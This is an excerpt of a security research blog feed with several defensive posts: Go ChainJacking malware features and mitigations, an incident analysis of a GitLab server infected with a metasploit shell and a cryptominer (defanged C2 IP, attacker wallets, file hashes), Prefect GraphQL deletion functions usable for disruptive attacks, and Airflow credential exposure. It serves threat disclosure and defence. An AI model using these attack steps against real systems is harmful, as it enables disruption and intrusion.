&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;time&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;Sleep&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;10&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;time&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;Second&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt;&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;The injected code uses common techniques used by other malware written in Go.
It performs a process enumeration which is sometimes performed by malware to
determine if it is executed in a sandbox or being analyzed. Another feature of
the code is to perform data exfiltration of base64 encoded data. Command
execution is simulated by allowing the Command and Control (C2) server to send
a command to be executed by the injected code. Finally, an alternative payload
is embedded, allowing the injected code to behave as a dropper. The same
resource embedding library has been used by malware in the past.&lt;/p&gt;
&lt;p&gt;If we build another application whose dependency uses the vulnerable
repository, the modified logging package is included in the final binary. If we
analyze the binary with &lt;a href="http://analyze.intezer.com"target="_blank" rel="noopener"&gt;Intezer Analyze&lt;/a&gt; we can
see that it detected 14 unique code genes.&lt;/p&gt;
&lt;p&gt;We can confirm that the unique genes are indeed part of the malicious code that
we injected because we can see this section of code is located in the
&lt;code&gt;collectData&lt;/code&gt; function.&lt;/p&gt;
&lt;h2&gt;GitHub Mitigation&lt;span class="hx:absolute hx:-mt-20" id="github-mitigation"&gt;&lt;/span&gt;
&lt;a href="#github-mitigation" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;In an effort to address this issue and similar ones, GitHub introduced
&lt;a href="https://github.blog/2018-04-18-new-tools-for-open-source-maintainers/#popular-repository-namespace-retirement"target="_blank" rel="noopener"&gt;Popular repository namespace retirement&lt;/a&gt;.
This measure should ensure that attacks such as ChainJacking won&amp;rsquo;t be possible
on popular code packages that might have a substantial impact. To do that,
GitHub &amp;ldquo;retires the namespace of any open-source project that had more than 100
clones in the week leading up to the owner&amp;rsquo;s account being renamed or deleted.&amp;rdquo;&lt;/p&gt;
&lt;h2&gt;Mitigation Recommendations&lt;span class="hx:absolute hx:-mt-20" id="mitigation-recommendations"&gt;&lt;/span&gt;
&lt;a href="#mitigation-recommendations" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;The good news is that while ChainJacking has the potential to cause incidents
with severe widespread effects, it can also be mitigated relatively simply.
Combining Checkmarx and Intezer&amp;rsquo;s technologies, we were able to recognize the
possible source of the attack at the code level while also identifying the
impact of this attack vector at the application level.&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;To help detect vulnerable packages in your dependency tree, we are
&lt;a href="https://github.com/checkmarx/chainjacking"target="_blank" rel="noopener"&gt;released an open-source tool on GitHub&lt;/a&gt;.
Check it out and consider incorporating it into your development or build
pipeline.&lt;/li&gt;
&lt;li&gt;Scan software releases for tampering and backdoors before delivering to
customers or deploying to production.
&lt;a href="https://intezer.com/blog/malware-analysis/securing-the-software-supply-chain/"target="_blank" rel="noopener"&gt;Learn more&lt;/a&gt;
about how Intezer can help you release your software with peace of mind.&lt;/li&gt;
&lt;li&gt;Checkmarx monitors packages that can be taken over and alerts the ecosystem
(including Go and GitHub) in case a suspicious activity is detected. This
means that Checkmarx customers are automatically protected from
ChainJacking.&lt;/li&gt;
&lt;/ol&gt;
&lt;h2&gt;What&amp;rsquo;s Next?&lt;span class="hx:absolute hx:-mt-20" id="whats-next"&gt;&lt;/span&gt;
&lt;a href="#whats-next" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;Software supply chain attacks are on the rise because they can be difficult to
detect and have the potential for widespread impact. ChainJacking described in
this research provides attackers with new infection opportunities and further
adds to the challenges companies face when securing their software supply
chain.&lt;/p&gt;
&lt;p&gt;To demonstrate the potential outcome of such an attack, we showed the direct
link between a real-life vulnerable package and popular admin tools intended to
run with high privileges. While we have found no evidence of attackers using
ChainJacking in the wild at this moment, the potential damage of an
exploitation of this kind could be compared to the recent attacks against
Kaseya and SolarWinds.&lt;/p&gt;
&lt;h2&gt;Disclosure Timeline&lt;span class="hx:absolute hx:-mt-20" id="disclosure-timeline"&gt;&lt;/span&gt;
&lt;a href="#disclosure-timeline" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;ul&gt;
&lt;li&gt;8 Oct 21 – Full report sent&lt;/li&gt;
&lt;li&gt;8 Oct 21 – GitHub acknowledges receiving the report&lt;/li&gt;
&lt;li&gt;20 Oct 21 – GitHub asked for clarifications&lt;/li&gt;
&lt;li&gt;20 Oct 21 – Clarifications sent together with a PoC video&lt;/li&gt;
&lt;li&gt;30 Oct 21 – GitHub responded indicating that this is a known behavior and
referenced their
&lt;a href="https://github.blog/2018-04-18-new-tools-for-open-source-maintainers/#popular-repository-namespace-retirement"target="_blank" rel="noopener"&gt;documentation&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;5 Nov 21 – Email sent to Go security team&lt;/li&gt;
&lt;li&gt;10 Nov 21 – Response from Go security team acknowledging it as an issue but
not something they could fix&lt;/li&gt;
&lt;li&gt;16 Nov 21 – Full disclosure&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>Conducting Digital Forensics Incident Response (DFIR) on an Infected GitLab Server</title><link>https://research.intezer.com/blog/2021/11/dfir-infected-gitlab-server/</link><pubDate>Thu, 04 Nov 2021 00:00:00 +0000</pubDate><guid>https://research.intezer.com/blog/2021/11/dfir-infected-gitlab-server/</guid><description>
&lt;h2&gt;GitLab servers are under attack with a now-patched critical vulnerability&lt;span class="hx:absolute hx:-mt-20" id="gitlab-servers-are-under-attack-with-a-now-patched-critical-vulnerability"&gt;&lt;/span&gt;
&lt;a href="#gitlab-servers-are-under-attack-with-a-now-patched-critical-vulnerability" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;Earlier this week we investigated an incident that occurred on a user&amp;rsquo;s GitLab
server. After the user installed a sensor on their server, an initial runtime
scan was performed. An alert was immediately triggered on the execution of a
malicious metasploit shellcode named &lt;code&gt;gitlab.elf&lt;/code&gt;, which occurred a few days
prior to the installation of the sensor. Several hours later another alert was
triggered, this time upon the execution of an XMRig Miner. The malware was also
executed several days before the sensor was installed. We notified the user and
began our own investigation with the goal of understanding how the attacker got
into the system and what the scope of the incident was. Consistent with our
findings,
&lt;a href="https://thehackernews.com/2021/11/alert-hackers-exploiting-gitlab.html"target="_blank" rel="noopener"&gt;news broke&lt;/a&gt;
later that day that attackers were exploiting a GitLab unauthenticated remote
code execution (RCE) vulnerability. In this post we describe the investigation
process conducted by Intezer&amp;rsquo;s research and engineering teams using the runtime
security sensor installed on the victim&amp;rsquo;s host.&lt;/p&gt;
&lt;h2&gt;The Incident&lt;span class="hx:absolute hx:-mt-20" id="the-incident"&gt;&lt;/span&gt;
&lt;a href="#the-incident" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;The individual was a new user who had just installed the a sensor on a CentOS
host. Immediately after the install, an initial scan was performed and the
sensor identified a running shellcode inside a container on the user&amp;rsquo;s host.
The alert presented important information about the execution of the process
including the process tree, execution path, details about the user&amp;rsquo;s host, and
the files containing malware. Using this information, we were able to get more
details about the malicious process:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The process was executed inside a container based on a
&lt;code&gt;gitlab/gitlab-ce:12.10.10-ce.0&lt;/code&gt; Docker image&lt;/li&gt;
&lt;li&gt;The path and filename of the malicious process is
&lt;code&gt;/var/opt/gitlab/gitlab-workhorse/gitlab.elf&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;EUID of the process is 998&lt;/li&gt;
&lt;li&gt;The process connected to &lt;code&gt;172.96.190[.]95:904&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;The alert also
&lt;a href="https://analyze.intezer.com/files/cd54a34dbd7d345a7fd7fd8744feb5c956825317e9225edb002c3258683947f1"target="_blank" rel="noopener"&gt;links&lt;/a&gt;
to Intezer, which identifies the shellcode as a metasploit.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;During this time, the second alert appeared, shown below, notifying the user
that an XMRig Miner was executed inside the container. The name of the file
that contains the malware was &lt;code&gt;syslogd64&lt;/code&gt;. Using the parent process ID (PPID)
information from the alert, we were able to determine that it was executed by a
script called &lt;code&gt;okk.sh&lt;/code&gt;. The shellcode in &lt;code&gt;gitlab.elf&lt;/code&gt; provides a reverse TCP
shell that delivers &lt;code&gt;okk.sh&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;We inspected the events that occurred on the victim&amp;rsquo;s host and found a curl
command executed inside the container. Shown below are Events which can be
accessed from the sensor dashboard. A curl command is seen which uses the
whoami value as part of the target&amp;rsquo;s hostname.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/11/dfir-infected-gitlab-server/images/fig1.png" title="Curl command seen under Events." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Curl command seen under Events.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;We were also able to find another script called &lt;code&gt;tmp.sh&lt;/code&gt; under the Events tab.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The scripts install an XMRig Miner and implement persistence by creating a
systemd service while adding the malware to a &lt;code&gt;.profile&lt;/code&gt; file in the user&amp;rsquo;s
home folder.&lt;/li&gt;
&lt;li&gt;Another wallet ID is used in this script:
&lt;code&gt;44wrH5Y3VXn577ZJHAJwZG8pLMNQXURsGKnNfbwUNmv3fJdHcedednZSna9hbFU5ojBkF83beV5CJYnqh9jnZNNdTJ4oXor&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/11/dfir-infected-gitlab-server/images/fig2.png" title="View of tmp.sh execution event from the sensor." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;View of tmp.sh execution event from the sensor.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/11/dfir-infected-gitlab-server/images/fig3.png" title="Tmp.sh execution event." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Tmp.sh execution event.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;We examined &lt;code&gt;okk.sh&lt;/code&gt; and got the following details:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The script removes previously installed cryptominers.&lt;/li&gt;
&lt;li&gt;The script tries to remove the malware that is executed in this attack but it
doesn&amp;rsquo;t seem to work.&lt;/li&gt;
&lt;li&gt;The installation command, Install XMRig miner, is copied from the pool&amp;rsquo;s
setup documentation page, shown in the image below.&lt;/li&gt;
&lt;li&gt;The wallet ID used by the attacker is
&lt;code&gt;45P62r6YsHWagiRZ6K5tGeKPy2tFFwfYvdfatsKHCC7wATRrsKqqSFySocLVtrKFzYj1RzYu2mSD9HXBofYusbfdAiSCkvM&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/11/dfir-infected-gitlab-server/images/fig4.png" title="Installation command for the cryptominer" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Installation command for the cryptominer&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;The victim&amp;rsquo;s host exposed the GitLab authentication page on port 8080. We can
assume that the breach happened due to weak credentials picked up by the
attacker, or by abusing the recently discovered RCE vulnerability
(&lt;a href="https://nvd.nist.gov/vuln/detail/CVE-2021-22205"target="_blank" rel="noopener"&gt;CVE-2021-22205&lt;/a&gt;) in GitLab.&lt;/p&gt;
&lt;h2&gt;Looking Inside the Wallets&lt;span class="hx:absolute hx:-mt-20" id="looking-inside-the-wallets"&gt;&lt;/span&gt;
&lt;a href="#looking-inside-the-wallets" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;We were able to view the status of the wallets in the pool&amp;rsquo;s dashboard. Each
wallet was using hundreds of workers at the time of this post. The images below
show details of the wallets including their hash rates and activity of the
cryptominers.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/11/dfir-infected-gitlab-server/images/fig5.png" title="Hash rates of the wallet." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Hash rates of the wallet.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/11/dfir-infected-gitlab-server/images/fig6.png" title="Hash rates of the second wallet." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Hash rates of the second wallet.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;h2&gt;Threat Detection and Response&lt;span class="hx:absolute hx:-mt-20" id="threat-detection-and-response"&gt;&lt;/span&gt;
&lt;a href="#threat-detection-and-response" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;Attackers are constantly searching for internet-facing instances and
applications that are vulnerable, misconfigured, or have weak credentials.
Users should always install the latest security updates, patch their systems,
avoid exposing applications to the internet when they can, and enforce
multi-factor authentication. While it&amp;rsquo;s important to implement all the right
security policies and to keep systems up to date, zero-days are bound to
happen. Runtime protection solutions come in handy for detecting when the
attacker has already compromised the environment and launched malware. This
post was a joint effort between Intezer&amp;rsquo;s research and engineering teams.
Special thanks to Adir Shemesh.&lt;/p&gt;
&lt;h2&gt;IoCs&lt;span class="hx:absolute hx:-mt-20" id="iocs"&gt;&lt;/span&gt;
&lt;a href="#iocs" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;h3&gt;Gitlab.elf&lt;span class="hx:absolute hx:-mt-20" id="gitlabelf"&gt;&lt;/span&gt;
&lt;a href="#gitlabelf" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;&lt;code&gt;cd54a34dbd7d345a7fd7fd8744feb5c956825317e9225edb002c3258683947f1&lt;/code&gt;&lt;/p&gt;
&lt;h3&gt;Syslogd64&lt;span class="hx:absolute hx:-mt-20" id="syslogd64"&gt;&lt;/span&gt;
&lt;a href="#syslogd64" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;&lt;code&gt;be6ac1ac095545af4a192c55b259f882933269fc7abf06f283b07487b6253ea7&lt;/code&gt;&lt;/p&gt;
&lt;h3&gt;Okk.sh&lt;span class="hx:absolute hx:-mt-20" id="okksh"&gt;&lt;/span&gt;
&lt;a href="#okksh" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;&lt;code&gt;7d9adc0b7caebe60ab3e5709e1e6de48b6455f352afff61acf53620f9999139f&lt;/code&gt;&lt;/p&gt;
&lt;h3&gt;Tmp.sh&lt;span class="hx:absolute hx:-mt-20" id="tmpsh"&gt;&lt;/span&gt;
&lt;a href="#tmpsh" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;&lt;code&gt;00fc15eadd33b1055cd3f30869363c6498d2668b8f1e244e82ba1a9abff58bf1&lt;/code&gt;&lt;/p&gt;
&lt;h3&gt;Wallet IDs&lt;span class="hx:absolute hx:-mt-20" id="wallet-ids"&gt;&lt;/span&gt;
&lt;a href="#wallet-ids" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;&lt;code&gt;44wrH5Y3VXn577ZJHAJwZG8pLMNQXURsGKnNfbwUNmv3fJdHcedednZSna9hbFU5ojBkF83beV5CJYnqh9jnZNNdTJ4oXor&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;code&gt;45P62r6YsHWagiRZ6K5tGeKPy2tFFwfYvdfatsKHCC7wATRrsKqqSFySocLVtrKFzYj1RzYu2mSD9HXBofYusbfdAiSCkvM&lt;/code&gt;&lt;/p&gt;</description></item><item><title>Exposed Prefect Workflows Could Lead to Disruptive Attacks</title><link>https://research.intezer.com/blog/2021/10/exposed-prefect-workflows-could-lead-to-disruptive-attacks/</link><pubDate>Tue, 26 Oct 2021 00:00:00 +0000</pubDate><guid>https://research.intezer.com/blog/2021/10/exposed-prefect-workflows-could-lead-to-disruptive-attacks/</guid><description>
&lt;h2&gt;Introduction&lt;span class="hx:absolute hx:-mt-20" id="introduction"&gt;&lt;/span&gt;
&lt;a href="#introduction" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;Workflow management platforms are powerful tools for automating and managing
complex tasks. Integrating workflow platforms can help companies coordinate and
ease their business processes as well as increase the productivity of their
teams. When the instances are misconfigured, they can expose the systems to
potential attacks and data loss. This is why it&amp;rsquo;s crucial to properly set up
these instances. Companies recently learned this the hard way when
misconfiguring popular open-source workflow platforms
&lt;a href="../../../2021/07/new-attacks-on-kubernetes-via-misconfigured-argo-workflows/"&gt;Argo&lt;/a&gt;
and
&lt;a href="../../../2021/10/misconfigured-airflows-leak-credentials/"&gt;Airflow&lt;/a&gt;.
This post will focus on misconfigurations in the Prefect workflow platform. We
have identified hundreds of misconfigured Prefect instances which could be the
target of disruptive attacks. By using Prefect&amp;rsquo;s web UI and API function,
attackers can potentially modify and delete workflows, tasks, and agents,
including the history logs of previous executions, belonging to companies with
exposed instances. Disruptive attacks can cause data loss and business delays
affecting teams that integrate workflows into their daily routines and the
clients that depend on these workflows functioning properly. We did not find
any evidence of Prefect users having their information leaked as of yet.
Prefect users should verify that their instances are not exposed to the
internet and enable multi-factor authentication.&lt;/p&gt;
&lt;h2&gt;What is Prefect?&lt;span class="hx:absolute hx:-mt-20" id="what-is-prefect"&gt;&lt;/span&gt;
&lt;a href="#what-is-prefect" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;Prefect is a workflow management platform launched in 2018 and powered by the
open-source Prefect Core workflow engine. It&amp;rsquo;s a popular platform marked by its
7.6K stars on &lt;a href="https://github.com/prefecthq/prefect"target="_blank" rel="noopener"&gt;GitHub&lt;/a&gt;. There are two
ways to set up Prefect: 1) Using the
&lt;a href="https://www.prefect.io/cloud/"target="_blank" rel="noopener"&gt;Prefect Cloud&lt;/a&gt; engine or 2) Setting up a local
&lt;a href="https://github.com/prefecthq/server"target="_blank" rel="noopener"&gt;Prefect server&lt;/a&gt;. The main difference
between the two options is Prefect Cloud has everything already configured and
ready to use while the latter option requires users to put more effort into
configuring the infrastructure. Prefect uses a full
&lt;a href="https://docs.prefect.io/orchestration/ui/interactive-api.html"target="_blank" rel="noopener"&gt;GraphQL API&lt;/a&gt;
for interacting with the platform and easily accessing all of the information
stored in the platform. The API can be accessed using the web UI or through a
Python client. When using Prefect Cloud, authentication is required to access
the platform. However, when using the Prefect server, authentication is not
required by default, meaning that anyone with access to the server can get
information from the Prefect platform. For companies that have instances
exposed to the internet and which don&amp;rsquo;t incorporate authentication, essentially
this means that anyone can view the information stored by those companies on
Prefect. This includes flows, tasks, agents and projects. Unlike
&lt;a href="../../../2021/07/new-attacks-on-kubernetes-via-misconfigured-argo-workflows/"&gt;Argo&lt;/a&gt;
and
&lt;a href="../../../2021/10/misconfigured-airflows-leak-credentials/"&gt;Airflow&lt;/a&gt;,
Prefect is a much more secure platform and we did not find any evidence of
companies that use Prefect having their information leaked. We examined the
functions exposed by the API and the actions that users can make in the web UI.
There are several functions in the web UI and GraphQL API that can be used by
attackers to delete elements in the workflow platform and launch disruptive
attacks on the companies that own the exposed instances.&lt;/p&gt;
&lt;h2&gt;How is the Attack Executed?&lt;span class="hx:absolute hx:-mt-20" id="how-is-the-attack-executed"&gt;&lt;/span&gt;
&lt;a href="#how-is-the-attack-executed" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;Workflows can be deleted with a single button click in the web UI as shown
below.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/10/exposed-prefect-workflows-could-lead-to-disruptive-attacks/images/fig1.png" title="Deleting a workflow in the web UI." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Deleting a workflow in the web UI.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Another way to delete workflows, as well as projects, tasks and agents, is by
using queries from the GraphQL API, which is available in the web UI or on port
4200 of the server that runs the Prefect platform. Using a simple query, an
attacker can retrieve the ID of the elements they plan to delete and then use
the suitable API functions to delete the elements. Those elements are
&lt;code&gt;delete_task&lt;/code&gt;, &lt;code&gt;delete_flow&lt;/code&gt;, &lt;code&gt;delete_project&lt;/code&gt; or &lt;code&gt;delete_agent&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/10/exposed-prefect-workflows-could-lead-to-disruptive-attacks/images/fig2.png" title="Obtaining the ID of a task using GraphQL API." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Obtaining the ID of a task using GraphQL API.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/10/exposed-prefect-workflows-could-lead-to-disruptive-attacks/images/fig3.png" title="Deleting a task which has a specific ID." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Deleting a task which has a specific ID.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;h2&gt;The Risk of Exposed Prefect Instances&lt;span class="hx:absolute hx:-mt-20" id="the-risk-of-exposed-prefect-instances"&gt;&lt;/span&gt;
&lt;a href="#the-risk-of-exposed-prefect-instances" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;Prefect instances exposed to the internet don&amp;rsquo;t enable authentication by
default, allowing attackers to delete elements in the platform and disrupt the
everyday work of the organization. This type of attack can affect an
organization in several ways:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Data loss – losing information about workflows, tasks and data from previous
deployments&lt;/li&gt;
&lt;li&gt;Disruption – workflows are a key utility leveraged by different teams to
accomplish tasks. Damage in a company&amp;rsquo;s Prefect instance affects all of the
teams from that company that use the platform and the clients that depend on
the service(s) provided by the victim company. For example, a company that
uses workflows to automate its purchasing process could be blocked from
making transactions until the issue is resolved. Another example is the
disruption of client onboarding processes powered by automated workflows&lt;/li&gt;
&lt;li&gt;Delays in project deployment – teams and customers relying on workflows to
accomplish tasks most likely would experience delays since it takes time to
restore the platform or even set up a new one. For example, a business that
uses automated workflows to send emails to its customers could experience
delays. In addition, disruption of a service could tarnish a company&amp;rsquo;s brand
and reputation resulting in financial loss&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Stay Secure&lt;span class="hx:absolute hx:-mt-20" id="stay-secure"&gt;&lt;/span&gt;
&lt;a href="#stay-secure" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;Misconfigurations are the number one cause of security breaches in the cloud
today. Companies exposing their instances to the internet without enforcing
authentication is always a bad idea, especially if the platform provides a
powerful API that can also be leveraged by attackers. While Prefect is more
secure than workflow platforms like Argo and Airflow, exposed Prefect
deployments are still candidates for disruptive attacks in which attackers can
alter the workflow environment and greatly damage the company that uses the
platform. We advise on adding firewall rules to hide the instance from the
internet and ensure that authentication is configured. If the application does
not offer sufficient authentication mechanisms, consider leveraging tools
provisioned by the cloud provider to implement your own authentication such as
GCP&amp;rsquo;s Identity-Aware Proxy or AWS&amp;rsquo;s Session Manager.&lt;/p&gt;</description></item><item><title>Misconfigured Airflows Leak Thousands of Credentials from Popular Services</title><link>https://research.intezer.com/blog/2021/10/misconfigured-airflows-leak-credentials/</link><pubDate>Mon, 04 Oct 2021 00:00:00 +0000</pubDate><guid>https://research.intezer.com/blog/2021/10/misconfigured-airflows-leak-credentials/</guid><description>
&lt;p&gt;&lt;em&gt;This research refers to misconfigured Apache Airflow managed by individuals or
organizations (&amp;lsquo;users&amp;rsquo;). As a result of the misconfiguration, the credentials
of users are exposed, including their own credentials to the different
platforms, applications and services mentioned in this article. This article
doesn&amp;rsquo;t refer to exposed credentials of the entities behind the development of
the platforms, applications and services themselves.&lt;/em&gt;&lt;/p&gt;
&lt;h2&gt;Apache Airflow is the #1 starred open-source workflows application on GitHub&lt;span class="hx:absolute hx:-mt-20" id="apache-airflow-is-the-1-starred-open-source-workflows-application-on-github"&gt;&lt;/span&gt;
&lt;a href="#apache-airflow-is-the-1-starred-open-source-workflows-application-on-github" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;Workflow management platforms are an indispensable tool for automating business
and IT tasks. These platforms make it easier to create, schedule and monitor
workflows. They are typically hosted on the cloud to provide increased
accessibility and scalability. On the flip side, misconfigured instances that
allow internet-wide access make these platforms ideal candidates for
exploitation by attackers.&lt;/p&gt;
&lt;p&gt;While researching a misconfiguration in the popular workflow platform, Apache
Airflow, we discovered a number of unprotected instances. These unsecured
instances expose sensitive information of companies across the media, finance,
manufacturing, information technology (IT), biotech, e-commerce, health,
energy, cybersecurity, and transportation industries. In the vulnerable
Airflows, we see exposed credentials for popular platforms and services such as
Slack, PayPal, AWS and more.&lt;/p&gt;
&lt;h2&gt;Key Findings&lt;span class="hx:absolute hx:-mt-20" id="key-findings"&gt;&lt;/span&gt;
&lt;a href="#key-findings" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;ul&gt;
&lt;li&gt;A number of misconfigured Airflow instances have exposed the credentials of
popular services including cloud hosting providers, payment processing, and
social media platforms.&lt;/li&gt;
&lt;li&gt;Exposing secrets such as user credentials can cause data leakage or provide
attackers with the ability to spread further in the system.&lt;/li&gt;
&lt;li&gt;Customer data exposed as a result of a data leak can lead to violation of
data protection laws and the possibility of legal action.&lt;/li&gt;
&lt;li&gt;There is also the possibility that malicious code execution and malware can
be launched on the exposed production environments and even on Apache Airflow
itself.&lt;/li&gt;
&lt;li&gt;We have notified the identified entities to fix their misconfigured Airflow
instances as part of the responsible disclosure policy.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;All Apache Airflow users are urged to update to the latest version immediately
and make sure their deployments are only accessible to authorized users. In
addition, adopt &lt;a href="#secure-coding-practices"&gt;secure coding practices&lt;/a&gt;.&lt;/p&gt;
&lt;h2&gt;What is Apache Airflow?&lt;span class="hx:absolute hx:-mt-20" id="what-is-apache-airflow"&gt;&lt;/span&gt;
&lt;a href="#what-is-apache-airflow" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;Apache Airflow is an open-source workflow management platform. The platform
simplifies the process of creating and managing complex workflows. Airflow
provides plug-and-play integrations with many technologies. Its
&lt;a href="https://github.com/apache/airflow/"target="_blank" rel="noopener"&gt;GitHub&lt;/a&gt; repository has 22.8K stars, making
it the world&amp;rsquo;s most
&lt;a href="https://www.datarevenue.com/en-blog/airflow-vs-luigi-vs-argo-vs-mlflow-vs-kubeflow"target="_blank" rel="noopener"&gt;popular&lt;/a&gt;
open-source workflow project.&lt;/p&gt;
&lt;p&gt;Airflow uses standard Python to create and schedule workflows, providing users
with a dynamic and convenient way to work with the platform. There are several
concepts and features in Airflow that make it flexible and popular among users:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Directed Acyclic Graph (DAG) – the primary concept in Airflow that represents
a collection of tasks with defined dependencies and relationships.&lt;/li&gt;
&lt;li&gt;Task – the basic unit of execution in Airflow, with each node in the DAG
represented by a task.&lt;/li&gt;
